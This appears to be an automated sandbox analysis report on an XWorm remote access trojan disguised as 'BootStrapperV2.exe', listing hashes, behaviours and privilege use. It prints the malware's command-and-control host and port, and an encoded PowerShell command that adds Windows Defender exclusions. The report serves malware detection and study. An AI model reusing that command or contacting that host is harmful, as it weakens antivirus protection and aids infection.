Analysis
-
max time kernel
101s -
max time network
152s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
03-11-2024 05:43
Static task
static1
Behavioral task
behavioral1
Sample
BootStrapperV2.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
BootStrapperV2.exe
-
Size
86KB
-
MD5
18b7c253c7155c93a21a35a8f9389596
-
SHA1
5addcc53bf95e2f5fe72d4770b093f6262daeb55
-
SHA256
6c6218309f99b7daa7627c2f940f7f07e49eac4a868759cddda6a004e0e10a2e
-
SHA512
529bd396899184ca4b07a5d4fb2bfe1982c2d44fc4c24d3a15cf5f600c41fee49f3ce9f0798f47ce7b1482eacb23a33b9e2734e740a22924f52156b6e29b9608
-
SSDEEP
1536:hXARphtCCV1k1n8MZ0BNWL0pBfrICZFQECHNctTrzuaLi2vQPvG/UvI5MmmZu1Ac:huB1pi0XWikCZ4ctXzdvQPv0UIud8ArC
Malware Config
Extracted
xworm
where-reverse.gl.at.ply.gg:9999
-
Install_directory
%ProgramData%
-
install_file
Helper.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x002a0000000450e5-7.dat family_xworm behavioral1/memory/776-18-0x0000000000F60000-0x0000000000F7A000-memory.dmp family_xworm -
Xworm family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation BootStrapperV2.exe -
Executes dropped EXE 1 IoCs
pid Process 776 BootStrapper.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\BootStrapper.exe BootStrapperV2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2700 powershell.exe 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 776 BootStrapper.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeIncreaseQuotaPrivilege 2700 powershell.exe Token: SeSecurityPrivilege 2700 powershell.exe Token: SeTakeOwnershipPrivilege 2700 powershell.exe Token: SeLoadDriverPrivilege 2700 powershell.exe Token: SeSystemProfilePrivilege 2700 powershell.exe Token: SeSystemtimePrivilege 2700 powershell.exe Token: SeProfSingleProcessPrivilege 2700 powershell.exe Token: SeIncBasePriorityPrivilege 2700 powershell.exe Token: SeCreatePagefilePrivilege 2700 powershell.exe Token: SeBackupPrivilege 2700 powershell.exe Token: SeRestorePrivilege 2700 powershell.exe Token: SeShutdownPrivilege 2700 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeSystemEnvironmentPrivilege 2700 powershell.exe Token: SeRemoteShutdownPrivilege 2700 powershell.exe Token: SeUndockPrivilege 2700 powershell.exe Token: SeManageVolumePrivilege 2700 powershell.exe Token: 33 2700 powershell.exe Token: 34 2700 powershell.exe Token: 35 2700 powershell.exe Token: 36 2700 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2124 wrote to memory of 2700 2124 BootStrapperV2.exe 81 PID 2124 wrote to memory of 2700 2124 BootStrapperV2.exe 81 PID 2124 wrote to memory of 776 2124 BootStrapperV2.exe 83 PID 2124 wrote to memory of 776 2124 BootStrapperV2.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\BootStrapperV2.exe"C:\Users\Admin\AppData\Local\Temp\BootStrapperV2.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaABoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAZwBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AawBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAeABjACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\BootStrapper.exe"C:\Windows\BootStrapper.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:776
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
79KB
MD56a38c40e75c6a8bf59c27f075ae8fe50
SHA1dea1a6673aba42fff5091f1098530db6378b4843
SHA2563116545d3502db62348b0b8cd70a2a02e38a82309489f09cf11f346958c4b8e7
SHA5121740a10610ec5327089ea2a14e4750253a4059803ec7545432d63189a8cf31b2d6ec8ae8a4f6db5ae3070f1cdfc5c5eb05cdd65c8687f522f5f96244a1839c0d